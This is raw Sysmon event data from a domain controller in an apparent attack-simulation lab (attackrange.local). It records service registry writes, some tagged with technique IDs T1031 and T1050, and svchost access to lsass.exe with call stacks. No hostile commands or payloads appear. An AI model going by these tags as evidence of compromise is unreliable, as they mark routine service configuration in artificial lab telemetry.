12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\DisplayNameContact Data_b6adb 13241300x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 
13241300x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\StartDWORD (0x00000003) 13241300x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\Security\SecurityBinary Data 13241300x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\DisplayNameSync Host_b6adb 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 
12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\StartDWORD (0x00000002) 13241300x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 13241300x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\Security\SecurityBinary Data 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\DisplayNameCDPUserSvc_b6adb 13241300x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\ErrorControlDWORD (0x00000001) 13241300x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\StartDWORD (0x00000002) 13241300x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\TypeDWORD (0x000000e0) 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.089{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\S
ystem32\KERNEL32.DLL+84d4 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:12.073{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.073{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:12.042{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.042{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.042{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System
32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.042{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 